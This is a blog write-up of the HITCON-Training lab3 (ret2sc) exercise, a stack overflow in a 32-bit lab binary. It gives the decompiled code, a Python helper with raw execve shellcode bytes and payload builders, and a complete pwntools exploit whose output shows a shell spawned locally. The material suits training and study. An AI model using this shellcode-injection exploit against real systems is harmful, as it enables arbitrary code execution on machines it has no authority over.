[HITCON-Training] lab3
2019. 10. 30. 21:32 | Wargame & CTF/HITCON-Training
Summary
32bit
shellcode
Analysis
int __cdecl main(int argc, const char **argv, const char **envp)
{
char s; // [esp+1Ch] [ebp-14h]
setvbuf(stdout, 0, 2, 0);
printf("Name:");
read(0, &name, 0x32u);
printf("Try your best:");
return (int)gets(&s);
}
`name` is stored in the .bss section.
Even with ASLR enabled, the address of .bss does not change because the binary is not PIE (the checksec output below shows No PIE and NX disabled), so the plan is: write shellcode into `name` through the first `read`, then overflow `s` through `gets` (which has no length limit) so that the saved return address is overwritten with the address of `name`. Two things are worth checking before relying on this: NX must be disabled, since `name` lives in a writable data segment and the shellcode has to execute from there, and the distance from `s` to the saved return address should be measured in a debugger rather than read off the decompiler's `[ebp-14h]` annotation, which can be misleading when the compiler re-aligns the stack in main. The 0x1c + 4 bytes of padding used in the exploit below is the offset that worked against this binary.
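To make the two delivery constraints of this plan concrete (`read()` copies at most 0x32 raw bytes, `gets()` is unbounded but stops at the first newline) and to show how the padding length is normally measured with a cyclic pattern instead of trusting the decompiler, here is an added example. It is my code, not part of the original writeup and not from HITCON-Training. It assumes the `name` address 0x0804a060 and the 0x1c + 4 offset from the exploit on this page; the 23-byte execve shellcode is the classic one, used as a stand-in for `asm(shellcraft.sh())` so the block runs without pwntools and without the binary.

```python
import struct
from string import ascii_uppercase, ascii_lowercase, digits

# Values taken from the writeup (assumptions of this example, not computed here).
NAME_ADDR = 0x0804A060   # &name in .bss; fixed because the binary is not PIE
NAME_SIZE = 0x32         # read(0, &name, 0x32): at most 50 bytes land in name
RET_OFFSET = 0x1C + 0x4  # distance from s to the saved return address used in the exploit

# Classic 23-byte i386 execve("/bin/sh", NULL, NULL) shellcode, a stand-in for
# asm(shellcraft.sh()) so that this example runs without pwntools.
SHELLCODE = bytes.fromhex("31c050682f2f7368682f62696e89e3505389e1b00bcd80")


class PayloadError(ValueError):
    """Raised when a stage cannot be delivered through its input function."""


def stage1_name(shellcode: bytes = SHELLCODE) -> bytes:
    """Bytes for read(0, &name, 0x32).

    read() copies raw bytes, so NUL and newline bytes are fine here. The only
    constraint is the 0x32-byte count: anything longer is left in stdin and
    would be consumed by gets() as the start of stage 2.
    """
    if len(shellcode) > NAME_SIZE:
        raise PayloadError(
            f"shellcode is {len(shellcode)} bytes, read() only delivers {NAME_SIZE}")
    return shellcode


def stage2_overflow(ret_addr: int = NAME_ADDR, offset: int = RET_OFFSET) -> bytes:
    """Bytes for gets(&s): padding up to the saved return address, then &name.

    gets() has no length limit (that is the bug), but it stops at the first
    '\\n', so neither the padding nor the little-endian address may contain
    0x0a. NUL bytes are not a problem: gets() copies them and only appends its
    own terminator at the end, one byte past the overwritten address.
    """
    payload = b"A" * offset + struct.pack("<I", ret_addr)
    if b"\n" in payload:
        raise PayloadError("payload contains 0x0a; gets() would stop before the return address")
    return payload


def cyclic_pattern(length: int) -> bytes:
    """Metasploit-style pattern (Aa0Aa1Aa2...). Every 4-byte window is unique
    within the first 20280 bytes, so the EIP value at the crash pins down the
    padding length."""
    out = bytearray()
    for up in ascii_uppercase:
        for lo in ascii_lowercase:
            for dg in digits:
                out += (up + lo + dg).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    raise ValueError("length exceeds the unique range of the pattern")


def offset_of_eip(pattern: bytes, eip: int) -> int:
    """Given the EIP value a debugger reports after feeding `pattern` to
    gets(), return the number of padding bytes before the saved return address."""
    idx = pattern.find(struct.pack("<I", eip))
    if idx < 0:
        raise ValueError(f"eip {eip:#010x} is not part of the pattern")
    return idx


if __name__ == "__main__":
    # Constructed crash value: pretend the debugger showed the pattern bytes at
    # offset 0x20 in EIP after the gets() overflow.
    pat = cyclic_pattern(64)
    fake_eip = struct.unpack("<I", pat[RET_OFFSET:RET_OFFSET + 4])[0]
    print("offset from cyclic pattern:", hex(offset_of_eip(pat, fake_eip)))
    print("stage 1 (read):", stage1_name().hex())
    print("stage 2 (gets):", stage2_overflow().hex())
```

With a real target you would send `cyclic_pattern(100)` as the second input under gdb, copy the faulting EIP into `offset_of_eip`, and only then build `stage2_overflow` with that offset; the two stages must be sent in that order because `read` runs before `gets`.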
Exploit
from pwn import *
context(arch="i386", os="linux")
e = ELF("./ret2sc")
p = process("./ret2sc")

name = 0x804a060  # address of `name` in .bss (taken from IDA; fixed because the binary is not PIE)

# stage 1: read(0, &name, 0x32) copies the shellcode into .bss
p.recvuntil(b"Name:")
shellcode = asm(shellcraft.sh())
assert len(shellcode) <= 0x32  # read() delivers at most 0x32 bytes
p.send(shellcode)

# stage 2: gets(&s) has no length limit; overwrite the saved return address with &name
p.recvuntil(b":")
payload = b""
payload += b"A" * (0x1c + 0x4)  # padding up to the saved return address
payload += p32(name)
p.sendline(payload)
p.interactive()
cg10036@cg10036-virtual-machine:~/HITCON-Training/LAB/lab3$ p ex.py
[*] '/home/cg10036/HITCON-Training/LAB/lab3/ret2sc'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x8048000)
RWX: Has RWX segments
[+] Starting local process './ret2sc': pid 3649
[*] Switching to interactive mode
$ id
uid=1000(cg10036) gid=1000(cg10036) groups=1000(cg10036),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare),129(docker)